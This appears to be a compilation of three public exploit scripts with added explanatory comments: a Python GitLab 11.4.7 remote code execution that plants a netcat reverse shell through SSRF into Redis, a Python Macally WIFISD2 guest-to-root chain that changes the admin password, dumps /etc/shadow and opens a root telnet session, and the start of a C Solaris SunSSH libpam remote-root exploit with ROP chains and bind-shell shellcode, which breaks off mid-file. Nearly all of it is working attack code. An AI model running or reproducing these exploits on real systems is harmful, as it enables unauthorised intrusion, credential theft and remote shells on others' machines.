Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
</p>
</body>


</html>
            
# Exploit Title: Gitlab 11.4.7 - Remote Code Execution
# Date: 14-12-2020
# Exploit Author: Fortunato Lodari fox [at] thebrain [dot] net, foxlox
# Vendor Homepage: https://about.gitlab.com/
# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
# Tested On: Debian 10 + Apache/2.4.46 (Debian)
# Version: 11.4.7 community

import sys
import requests
import time
import random
import http.cookiejar
import os.path
from os import path

# Sign in to the GitLab 11.4.7 portal and capture (using Burp or a similar proxy):
# authenticity_token
# authenticated cookies
# username
# specify localport and localip for the reverse shell

# Per-session inputs captured from an authenticated GitLab session (see the
# comment above). authenticity_token is the Rails CSRF token of the "new
# project" form and cookie carries the _gitlab_session value; both are
# short-lived secrets, and the values here are presumably the author's lab
# values rather than anything reusable.
username='aaaaaaaaaaaa'
authenticity_token='jpT/n1EoPwwWtiGu/+QKVQomofMNyqAQXY+iD2kVoRQoiQNzcFHPAj2+M4pyblKo/7UkClKW8jvp51Aw2qzs7g=='
cookie = '_gitlab_session=c942527505cc0580c026610a1799b811; sidebar_collapsed=false'
# Listener address the target connects back to; kept as strings because they
# are concatenated into the payload and into the nc command line.
localport='1234'
localip='192.168.0.114'


# Base URL of the target instance. `proxies` is defined but never passed to
# the requests session in init(), so it has no effect as written.
url = "http://192.168.0.130:5080"
proxies = { "http": "http://localhost:8080" }


def deb(str):
    """Print *str* on stdout prefixed with ``Debug => ``.

    The parameter is named ``str`` in the original and shadows the builtin;
    it is kept for compatibility with existing callers.
    """
    message = "".join(("Debug => ", str))
    print(message)

def create_payload(authenticity_token,prgname,namespace_id,localip,localport,username):
    """Build the "new project" form fields that carry the exploit.

    Every field except ``project[import_url]`` is an ordinary value of
    GitLab's new-project form: the CSRF token, name/path/description all
    set to ``prgname``, the given namespace id and public visibility
    (``20``). ``project[import_url]`` is a ``git://`` URL whose host is the
    IPv6-mapped loopback address on port 6379 (Redis) and whose path embeds
    newline-separated Redis commands -- ``multi``, ``sadd`` of a queue name,
    ``lpush`` of a JSON job onto ``resque:gitlab:queue:system_hook_push``
    (class ``GitlabShellWorker`` with a ``class_eval`` argument that opens
    ``nc <localip> <localport> -e /bin/sh``) and ``exec``. The import fetch
    therefore talks to the instance's own Redis (SSRF) and enqueues a
    background job that spawns a reverse shell; the POC link in the header
    describes the chain.

    Defensive notes: an import URL pointing at a loopback or link-local
    address, or containing newline characters, is the observable indicator
    here and should be rejected and logged at the application edge.

    Returns a plain dict ready for urllib.parse.urlencode().
    """
    return {'utf8':'✓','authenticity_token':authenticity_token,'project[ci_cd_only]':'false','project[name]':prgname,'project[namespace_id]':namespace_id,'project[path]':prgname,'project[description]':prgname,'project[visibility_level]':'20','':'project[initialize_with_readme]','project[import_url]':'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/\n multi\n sadd resque:gitlab:queues system_hook_push\n lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\'|nc '+localip+' '+localport+' -e /bin/sh\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"\n exec\n exec\n exec\n/'+username+'/'+prgname+'.git'}

import string
def random_string(length):
    """Return ``length`` pseudo-random ASCII letters.

    Used to pick a throwaway project name; ``random`` (not ``secrets``) is
    fine here because the value is not a credential.
    """
    letters = string.ascii_letters
    picked = [random.choice(letters) for _ in range(length)]
    return "".join(picked)

def init(username,cookie,authenticity_token,localport,localip):
    """Drive the GitLab 11.4.7 import_url chain end to end.

    As written: fetch ``/projects/new`` with the captured session cookie,
    scrape the ``project_namespace_id`` input with BeautifulSoup (third-party
    ``bs4``, imported here rather than at module level), build and URL-encode
    the form payload from create_payload(), POST it to ``/projects`` and then
    block in ``nc -nvlp <localport>`` waiting for the target to connect back.

    Notes for readers:
    - ``url`` is the module-level target base URL; the module-level
      ``proxies`` dict is never passed to the session.
    - The POST response ``r`` is not inspected, so a rejected submission is
      not reported before the listener starts.
    - ``nsid[0]`` raises IndexError when the input is missing (e.g. an
      expired session returned the login page instead of the form).
    - ``re`` is imported but unused; the ``;`` after ``namespace_id`` is a
      stray statement terminator.
    - os.system() runs a shell command built by string concatenation;
      ``localport`` is a module constant here, not user input.
    """
    from bs4 import BeautifulSoup
    import re
    import urllib.parse
    deb("Token: "+authenticity_token)
    deb("Cookie: "+cookie)
    session=requests.Session()
    # The captured cookie is sent verbatim; the User-Agent value is arbitrary.
    headers = {'user-agent':'Moana Browser 1.0','Cookie':cookie,'Content-Type':'application/x-www-form-urlencoded','DNT':'1','Upgrade-Insecure-Requests':'1'}
    r=session.get(url+'/projects/new',headers=headers,allow_redirects=True)
    soup = BeautifulSoup(r.content,"lxml")
    nsid = soup.findAll('input', {"id": "project_namespace_id"})
    namespace_id=nsid[0]['value'];
    deb("Namespace ID: "+namespace_id)
    prgname=random_string(8)
    newpayload=create_payload(authenticity_token,prgname,namespace_id,localip,localport,username)
    newpayload=urllib.parse.urlencode(newpayload)
    deb("Payload encoded: "+newpayload)
    r=session.post(url+'/projects',newpayload,headers=headers,allow_redirects=False)
    # Foreground listener; returns only when nc exits.
    os.system("nc -nvlp "+localport)

# Runs at import time as well as under direct execution (no __main__ guard);
# this is the only call site of init() in this listing.
init(username,cookie,authenticity_token,localport,localip)
            
# Exploit Title: Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation
# Date: 03.12.2020 
# Exploit Author: Maximilian Barz and Daniel Schwendner
# Vendor Homepage: https://us.macally.com/products/wifisd2
# Version: 2.000.010
# Tested on: Kali Linux 5.7.0-kali1-amd64
# CVE : CVE-2020-29669
# Reference: https://github.com/S1lkys/CVE-2020-29669/

#!/usr/bin/env/python3
import requests
import telnetlib
import os
import sys
import re

# ASCII-art banner printed by main(); \033[94m switches the terminal to
# bright blue and \x1b[0m resets it. NOTE(review): the shebang at the top of
# this script reads `#!/usr/bin/env/python3` (a slash where a space is
# expected), so the file is not directly executable -- run it with python3.
banner = '''\033[94m
  ██████ ▄▄▄█████▓ ▄▄▄       ██▀███   ▄▄▄▄    █    ██  ██▀███    ██████ ▄▄▄█████▓
▒██    ▒ ▓  ██▒ ▓▒▒████▄    ▓██ ▒ ██▒▓█████▄  ██  ▓██▒▓██ ▒ ██▒▒██    ▒ ▓  ██▒ ▓▒
░ ▓██▄   ▒ ▓██░ ▒░▒██  ▀█▄  ▓██ ░▄█ ▒▒██▒ ▄██▓██  ▒██░▓██ ░▄█ ▒░ ▓██▄   ▒ ▓██░ ▒░
  ▒   ██▒░ ▓██▓ ░ ░██▄▄▄▄██ ▒██▀▀█▄  ▒██░█▀  ▓▓█  ░██░▒██▀▀█▄    ▒   ██▒░ ▓██▓ ░ 
▒██████▒▒  ▒██▒ ░  ▓█   ▓██▒░██▓ ▒██▒░▓█  ▀█▓▒▒█████▓ ░██▓ ▒██▒▒██████▒▒  ▒██▒ ░ 
▒ ▒▓▒ ▒ ░  ▒ ░░    ▒▒   ▓▒█░░ ▒▓ ░▒▓░░▒▓███▀▒░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░▒ ▒▓▒ ▒ ░  ▒ ░░   
░ ░▒  ░ ░    ░      ▒   ▒▒ ░  ░▒ ░ ▒░▒░▒   ░ ░░▒░ ░ ░   ░▒ ░ ▒░░ ░▒  ░ ░    ░    
░  ░  ░    ░        ░   ▒     ░░   ░  ░    ░  ░░░ ░ ░   ░░   ░ ░  ░  ░    ░      
      ░                 ░  ░   ░      ░         ░        ░           ░           
                                           ░                                     
\x1b[0m
Macally WIFISD2 Guest to Root Privilege Escalation for CVE-2020-29669 by Maximilian Barz and Daniel Schwendner 
'''
def main():
    """Entry point for the CVE-2020-29669 guest-to-root chain.

    Flow, as written in the nested helpers below: log in as ``guest`` via
    ``protocol.csp`` and use that session to set a new ``admin`` password
    (send_requests); log in over telnet as admin and read ``/etc/shadow``
    (telnet_grep_root_hash); compare the root entry against a hash the
    authors already know, else hand it to hashcat (crack_root_hash); finally
    open an interactive telnet session as root (telnet_login).

    Side effects: changes the device's admin password (a persistent, visible
    change), writes ``root_hash`` into the current directory and may run
    ``hashcat`` through os.system(). ``telnetlib`` is deprecated since
    Python 3.11 and removed in 3.13.
    """
    if(len(sys.argv) < 2):
        print(banner)
        print("Usage: %s <host> " % sys.argv[0])
        print("Eg:    %s 1.2.3.4 " % sys.argv[0])
        return
    rhost = sys.argv[1]
    session = requests.Session()
    # Password used for the guest login; presumably the device default --
    # not verified here.
    guest_creds = "guest_pass"
    # New admin password written by the pwdmod step below.
    admin_pass_to_set = "Silky123"

    def send_requests():
        """Guest login (opt=pwdchk) followed by an admin password change (opt=pwdmod)."""
        url = "http://"+rhost+"/protocol.csp?function=set"
        payload = {'fname':'security','opt':'pwdchk','name':'guest','pwd1':guest_creds,'function':'set'}
        headers = {
            'Host': rhost,
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
            'Accept': '*/*',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Referer': 'http://'+rhost+'/index.html',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Content-Length': '65',
            'Connection': 'close',
            'Cache-Control': 'no-cache',
        }
        
        # NOTE(review): ``headers`` is passed positionally, which binds to
        # Session.post()'s ``json=`` parameter rather than ``headers=``; since
        # ``data`` is given, the dict is silently ignored and none of these
        # headers are sent. The hand-written Content-Length would also
        # conflict with the one requests computes if they were applied.
        r= session.post(url, payload, headers)
        # The device answers with an XML-style body; errno 0 signals success.
        if (b"<errno>0</errno>" in r.content):
            print("\033[92m[+] Authentication successful\x1b[0m")
            print("\t"+str(session.cookies.get_dict()))
        else:
            print("\033[91m[+] Authentication failed.\x1b[0m")
            sys.exit()

        # Second request reuses the guest session's cookies to reset the
        # admin password -- the authorization flaw this PoC demonstrates.
        url = "http://"+rhost+"/protocol.csp?fname=security&function=set"    
        payload = {'name':'admin','opt':'pwdmod','pwd1':admin_pass_to_set,'pwd2':admin_pass_to_set}
        headers = {
            'Host': rhost,
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
            'Accept': '*/*',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Referer': 'http://'+rhost+'/app/user/guest.html',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Content-Length': '49',
            'Connection': 'close',
            'Cache-Control': 'no-cache',
        }
        # Same positional-argument issue as above: headers are not sent.
        d = session.post(url, payload, headers)
        if (b"<errno>0</errno>" in d.content):
            print("\033[92m[+] Admin Password changed to: "+admin_pass_to_set+"\x1b[0m")
            telnet_grep_root_hash()
            #print("[+] Spawning Admin Shell")
            #telnet_login()
        else:
            print("\033[91m[+] Admin Password change failed\x1b[0m")
            sys.exit()


    def telnet_grep_root_hash():
        """Log in over telnet as admin, dump /etc/shadow and save the root line.

        Every output line containing ':' is echoed; each line containing
        "root" is written to ./root_hash (opened without a context manager,
        ``hash`` shadows the builtin) and crack_root_hash() is called from
        inside that loop, so it may run more than once.
        """
        user = "admin"
        tn = telnetlib.Telnet(rhost)
        tn.read_until(b"login: ")
        tn.write(user.encode('ascii') + b"\n")
        tn.read_until(b"Password: ")
        tn.write(admin_pass_to_set.encode('ascii') + b"\n")
        print("\033[92m[+] Dumping Hashes:\x1b[0m")
        tn.write(b"cat /etc/shadow\n\r")
        tn.write(b"exit\n")
        # read_all() returns only after the remote side closes the session.
        output = tn.read_all().decode('ascii')
        L = output.split('\n')
        for hash in L:
            if ":" in hash:
                print("\t"+hash)
        print("\n\r")
        for hash in L:
            if "root" in hash:
                print("\033[92m[+] Root Hash found, trying to crack it..\x1b[0m")
                print("\t"+hash)  #root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::
                f = open("root_hash","w+")
                f.write(hash)
                f.close()
                crack_root_hash();


    def crack_root_hash():
        """Compare the saved root entry with a known hash, otherwise run hashcat.

        The known entry is the one the authors found on their device, for
        which the matching plaintext is printed; any other hash is handed to
        hashcat via os.system() with a hard-coded wordlist path that must
        exist on the operator's machine. The file is not closed explicitly.
        """
        f = open("root_hash", "r")
        hash = f.read()
        if ("root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::" in hash):
            print("\033[92mRoot Password: 20080826\x1b[0m\n")
            telnet_login()
        else:
            os.system("hashcat -a 0 -m 500 root_hash /root/tools/routersploit/routersploit/resources/wordlists/passwords.txt") #https://github.com/threat9/routersploit/blob/master/routersploit/resources/wordlists/passwords.txt

    def telnet_login():
        """Open an interactive telnet session as root with the known password."""
        print("\033[92m[+] Spawning Rootshell\x1b[0m")
        user = "root"
        root_password="20080826"
        tn = telnetlib.Telnet(rhost)
        tn.read_until(b"login: ")
        tn.write(user.encode('ascii') + b"\n")
        tn.read_until(b"Password: ")
        tn.write(root_password.encode('ascii') + b"\n")
        tn.interact()
    # Helpers are closures over rhost/session/admin_pass_to_set; the chain
    # starts here and the later steps are called from send_requests().
    print(banner)
    send_requests()

# Only run the chain when executed as a script, not when imported.
if(__name__ == '__main__'):
    main()
            
# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root 
# Exploit Author: Hacker Fantastic
# Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris11-overview.html
# Version: 11
# Tested on: SunOS solaris 5.11 11.0

/* SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871
 * ====================================================================
 * Makefile
 * all: hfsunsshdx
 *
 *	hfsunsshdx: main.c
 *	gcc main.c -o hfsunsshdx -lssh2 
 *
 *	clean:
 *	rm -rf hfsunsshdx
 *	rm -rf core.*
 *
 * A trivial to reach stack-based buffer overflow is present in libpam on
 * Solaris. The vulnerable code exists in pam_framework.c parse_user_name()
 * which allocates a fixed size buffer of 512 bytes on the stack and parses
 * usernames into the buffer via modules (authtok_get) without bounds checks.
 * This issue can be reached remotely pre-authentication via SunSSH when
 * "keyboard-interactive" is enabled to use PAM based authentication. The
 * vulnerability was discovered being actively exploited by FireEye in the
 * wild and is part of an APT toolkit called "EVILSUN". The vulnerability
 * is present in both SPARC/x86 versions of Solaris & others (eg. illumos).
 * This exploit uses ROP gadgets to disable nxstack through mprotect on x86
 * and a helper shellcode stub. The configuration in a default Solaris 
 * install is vulnerable. The exploit makes use of libssh2 and was tested on
 * Solaris 10 through 11.0. Solaris 9 does not ship with a vulnerable 
 * SunSSH implementation and versions later than 11.1 have updated SunSSH
 * code that prevents the issue being triggered.
 *
 * e.g.
 *  ./hfsunsshdx -s 192.168.11.220 -t 0 -x 2
 *  [+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871
 *  [-] chosen target 'Solaris 11 11/11 11.0 Sun_SSH_2.0 x86'
 *  [-] using shellcode 'Solaris 11.0 x86 bindshell tcp port 9999' 193 bytes
 *  [+] ssh host fingerprint: 01bc34fe8092e051716b91fd88eed210db2df49e
 *  [+] entering keyboard-interactive authentication.
 *  [-] number of prompts: 1
 *  [-] prompt 0 from server: 'Please enter user name: '
 *  [-] shellcode length 193 bytes
 *  [-] rop chain length 68
 *  [-] exploit buffer length 580
 *  [-] sending exploit magic buffer... wait
 *  [+] exploit success, handling payload...
 *  [-] connected.. enjoy :)
 *  SunOS solaris 5.11 11.0 i86pc i386 i86pc
 *   6:49pm  up 53 min(s),  1 user,  load average: 0.01, 0.01, 0.01
 *  helpdesk   console      Nov 27 17:57
 *  uid=0(root) gid=0(root)
 *
 * -- Hacker Fantastic (https://hacker.house)
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <ctype.h>
#include <getopt.h>
#include <time.h>
#include <signal.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/select.h>
#include <arpa/inet.h>
#include <sys/time.h>
#include <libssh2.h>

/* Process-wide state shared by the helpers declared below. How each field
 * is used is outside this excerpt; the names suggest the target/shell
 * sockets, the exploit buffer, the payload and a return-address string,
 * but that is not verified here. */
int sd = -1;
int oldsd = -1;
int ishell = -1;
char* buf;
char* payload;
char* retaddr;
struct sockaddr_in sain;

/* One supported build: a display name plus the ROP chain bytes that
 * targets[] below pairs with it. */
struct target {
	char* name;
	char* ropchain;
};

/* One payload option: a display name plus the raw shellcode bytes. The
 * table of shellcodes is not part of this excerpt. */
struct shellcode {
	char* name;
	char* shellcode;
};

/* Forward declarations; the definitions are outside this excerpt.
 * NOTE: "on_interupt" is spelled with one 'r' here, so every caller and
 * the definition must use the same spelling. */
void spawn_shell(int);
void bindshell_setup(short);
void on_alarm(int);
void on_interupt(int);
void prepare_payload();

/* NOTE(review): hard-coded entry count for targets[] (declared next); it is
 * not derived from the array, so it must be updated by hand whenever the
 * table changes. */
const int targetno = 5;
struct target targets[] = {
	{"Solaris 11 11/11 11.0 Sun_SSH_2.0 x86",
	"\x41\x42\x43\x44"  // %ebx
	"\x45\x46\x47\x48"  // %esi 
	"\x50\x51\x52\x53"  // %ebp
	"\xa7\x0e\x06\x08"  // pop %ecx, pop %edx, pop %ebp
	"\x9c\x3e\x04\x08"  // ptr to (0x?, 0x?, 0x8044cf0, 0x7) 
	"\x01\x01\x04\x08"  // %edx unused, must be writeable addr
	"\x41\x42\x43\x44"  // %ebp unused var 
	"\x93\xdb\xc8\xfe"  // pop %edx ; ret
	"\x01\x30\x04\x08"  // ptr to 0x08043001 mprotect arg
	"\x1a\xe7\x0b\xfe"  // dec %edx ; ret 
	"\x79\x41\xfe\xfe"  // mov %edx,$0x4(%ecx) ; xor %eax, %eax ; ret
	"\x93\xdb\xc8\xfe"  // pop %edx ; ret 
	"\x01\x30\x04\x08"  // ptr to shellcode
	"\xe0\xe8\x3e\xfe"  // mov $0x72,%al 
	"\x64\x7c\xc3\xfe"  // inc %eax ; ret
        "\x64\x7c\xc3\xfe"  // inc %eax ; ret	
	"\x22\x9d\xd3\xfe"},// sysenter
	{"Solaris 11 Express (snv_151a) Sun_SSH_1.5 x86",
	"\x41\x42\x43\x44"  // %ebx overwrite unused
	"\x41\x42\x43\x44"  // %esi overwrite unused
	"\xf8\x32\x04\x08"  // %ebp overwrite unused
	"\xb7\xf9\x05\x08"  // pop %ecx ; pop %edx ; pop %ebp ; ret
	"\x7e\x36\x02\x04"  // ptr/2 to (0x?, 0x0, 0x1000, 0x7) 
	"\x01\x30\x04\x08"  // ptr for %edx
	"\x44\x43\x42\x41"  // ptr for %ebp unused
	"\xe4\xd4\xde\xfe"  // dec %edx ; add %ecx, %ecx ; ret
	"\x19\x42\xfe\xfe"  // mov %edx,$0x4(%ecx) ; xor %eax, %eax; ret
	"\xb8\xf9\x05\x08"  // pop %edx ; pop %ebp ; ret
	"\xeb\x30\x04\x08"  // shellcode ptr for %edx
	"\x1c\x33\x04\x08"  // %ebp & used by "leave"
        "\x84\x98\x51\xfe"  // mov $0x82, %eax ; pop %esi ; pop %ebx ; leave ; ret
        "\x41\x42\x43\x44"  // %esi unused
        "\xe0\x30\x04\x08"  // shellcode ptr to %ebx                              
        "\xe8\x32\x04\x08"  // ptr into %ebp        
        "\x19\x3f\xfe\xfe"  // sub $0x4,%eax ; ret  
        "\x19\x3f\xfe\xfe"  // sub $0x4,%eax ; ret
        "\x19\x3f\xfe\xfe"  // sub $0x4,%eax ; ret
        "\x11\x3f\xfe\xfe"  // sub $0x2,%eax ; ret
	"\xfe\xf8\xcf\xfe"},// sysenter
	{"Solaris 10 1/13 (147148-26) Sun_SSH_1.1.5 x86",
	"\xc3\x31\x04\x08"  // overwrite %ebp unused
	"\xa3\x6c\xd8\xfe"  // mov $0x74, %eax ; ret
	"\x29\x28\x07\x08"  // pop %ebx ; ret
	"\xf0\xff\xaf\xfe"  // 0x0a writen to address, unused gadget
	"\x08\xba\x05\x08"  // pop %edx ; pop %ebp ; ret
	"\x01\x30\x04\x08"  // %edx pointer to page
	"\xb8\x31\x04\x08"  // unused %ebp value
	"\xaa\x4c\x68\xfe"  // pop %ecx ; ret
	"\xe0\x6e\x04\x08"  // ptr (0x?,0x0,0x1000,0x7)
	"\x61\x22\x07\x08"  // dec %edx ; ret
	"\x8b\x2d\xfe\xfe"  // mov %edx,0x4(%ecx) ; xor %eax,%eax ; ret
	"\xa3\x6c\xd8\xfe"  // mov $0x74, %eax ; ret
	"\x08\xba\x05\x08"  // pop %edx ; pop %ebp ; ret
	"\xc3\x31\x04\x08"  // shellcode addr for %edx
	"\xc3\x31\x04\x08"  // unused %ebp value
	"\xf6\x0d\xf4\xfe"},// sysenter, (ret into shellcode via %edx)
	{"Solaris 10 8/11 (147441-01) Sun_SSH_1.1.4 x86",
	"\xc3\x31\x04\x08"  // overwrite %ebp unused
	"\x73\x6a\xd7\xfe"  // mov $0x74, %eax ; ret
	"\xb1\x26\x07\x08"  // pop %ebx ; ret
	"\xff\x01\xac\xfe"  // write garbage here, unused gadget
	"\x98\xb9\x05\x08"  // pop %edx ; pop %ebp ; ret
	"\xff\x2f\x04\x08"  // %edx pointer to page
	"\xc3\x31\x04\x08"  // unused %ebp value
	"\x57\xaa\xe4\xfe"  // pop %ecx ; ret
	"\x94\x11\x5f\xfe"  // ptr rwx (0x?,0x04b,0xe50,0x7)
	"\xee\x6a\x65\xfe"  // inc %edx ; ret
	"\x9b\xc5\xc1\xfe"  // mov %edx,0x4($ecx) ; xor %eax,%eax ; ret
	"\x73\x6a\xd7\xfe"  // mov $0x74, %eax ; ret
	"\x86\xae\xe5\xfe"  // pop %edx ; ret
	"\xc3\x31\x04\x08"  // shellcode return address for %edx
	"\x66\x56\xb9\xfe"},// sysenter (ret into shellcode via %edx)
	{"Solaris all Sun_SSH_1.x.x debug crash target",
	"\x41\x42\x43\x43"  // %ebp ptr
	"\x78\x79\x80\x81"} // %eip ptr
};

/* Payloads, indexed by the -x option. shellno must equal the number of entries
 * (four here): --help loops over 0..shellno-1 and the 'x' case in main() only
 * accepts 0..3. on_alarm() maps index 0/2 to port 9999 and 1/3 to port 8080,
 * which must stay in step with the names below. Every entry is prefixed by a
 * NOP sled and an mprotect() stub so the stack becomes executable before the
 * generated bind-shell bytes run. */
const int shellno = 4;

struct shellcode shellcodes[] = {
	{"Solaris x86 bindshell tcp port 9999",
	/* mprotect magic stub necessary for payloads expecting +x stack */
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9"
	"\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50"
	"\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91"
	/* mprotect_shellcode.S Solaris x86 mprotect(0x08044000,0x7000,0x07);
	   ==================================================================
		xorl %eax, %eax
  		xorl %ecx, %ecx
  		movl $0x08041001, %ebx
  		movw $0x7001, %ax
  		movb $0x7,%cl
  		dec %ebx
  		dec %eax
  		pushl %ecx
  		pushl %eax
  		pushl %ebx
  		pushl %ebx
  		movl %esp, %ecx
  		xorl %eax, %eax
		movb $0x74, %al
		int $0x91
	*/
	/* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=9999 -f c -e x86/xor_dynamic */
	"\xeb\x23\x5b\x89\xdf\xb0\x55\xfc\xae\x75\xfd\x89\xf9\x89\xde"
        "\x8a\x06\x30\x07\x47\x66\x81\x3f\x2a\x95\x74\x08\x46\x80\x3e"
        "\x55\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x55\x69"
        "\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1"
        "\x51\x69\xfe\x03\x26\x0e\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b"
        "\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7"
        "\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51"
        "\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72"
        "\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52"
        "\xb1\x3a\xfe\xd7\x2a\x95"},
	{"Solaris x86 bindshell tcp port 8080",
	/* mprotect magic stub necessary for payloads expecting +x stack */
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9"
	"\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50"
	"\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91"
	/* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=8080 -f c -e x86/xor_dynamic */
	"\xeb\x23\x5b\x89\xdf\xb0\x9a\xfc\xae\x75\xfd\x89\xf9\x89\xde"
	"\x8a\x06\x30\x07\x47\x66\x81\x3f\x44\x60\x74\x08\x46\x80\x3e"
	"\x9a\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x9a\x69"
	"\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1"
	"\x51\x69\xfe\x03\x1e\x91\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b"
	"\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7"
	"\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51"
	"\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72"
	"\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52"
	"\xb1\x3a\xfe\xd7\x44\x60"},
	/* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */
	{"Solaris 11.0 x86 bindshell tcp port 9999",
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70"
	"\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89"
	"\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different
	"\xb8\x5d\x6d\x26\x15\xda\xce\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
	"\x19\x31\x42\x15\x83\xea\xfc\x03\x42\x11\xe2\xa8\x05\xd9\xcd"
	"\xad\xea\x4f\x8b\xd8\xf5\x67\x05\xde\x0f\x91\x9b\x1e\xbf\xf6"
	"\x24\x9c\x67\x08\x52\x47\x0d\x14\x34\xd7\xb8\x1a\xde\xd5\x8c"
	"\xfd\xe1\x0f\x86\x11\x49\xff\x66\xd2\xc5\x17\x77\x04\x7e\xb7"
	"\xdb\x19\x68\xc8\x0a\xe9\x81\xc9\x65\x60\x5f\x5f\x83\x25\x35"
	"\xa1\xcb\x3a\x1f\x22\xa4\x1c\xd9\x2a\x0a\x5d\x4a\xba\x42\x72"
	"\x18\x52\xf5\xa3\xbc\xcb\x6b\x35\xa3\x5b\x27\xcc\xc5\x0b\x97"
	"\x9f\x56\x1b\x2c\xdf\x8f"},
	/* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */
	{"Solaris 11.0 x86 bindshell tcp port 4444",
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70"
	"\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89"
	"\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different
	"\xb8\x8d\x2e\x32\x79\xd9\xe5\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
	"\x19\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\x78\x46\xcd\xa1"
	"\x7d\xab\x5b\x37\x08\x32\x6c\xe1\x0e\x4d\x85\x3f\xce\xe1\xc2"
	"\xc0\xcc\x1e\x83\xb6\x37\x4a\xa1\x98\xe7\xe1\xa7\x72\x05\x46"
	"\x41\x7d\xdf\xcc\x9e\xd5\x8f\x21\x5f\x69\xc7\xbd\x89\xd1\x47"
	"\x11\x86\x0f\x98\x43\x56\x25\x99\xba\xfd\xb3\x0f\x4a\x52\xae"
	"\xf1\x14\xad\xf8\xf2\xea\x89\x7c\xfa\xc4\xe9\x2f\x6a\x08\xc5"
	"\xbc\x02\x3e\x36\x21\xbb\xd0\xc1\x46\x6b\x7e\x5b\x69\xdb\xd0"
	"\x0a\x39\x6b\xeb\x53\x6b"}
};

/* Relay loop: copies stdin to the socket and socket output to stdout until the
 * peer closes. A fixed "uname -a;uptime;who;id" line is written first, which is
 * what produces the banner in the usage example at the top of the file.
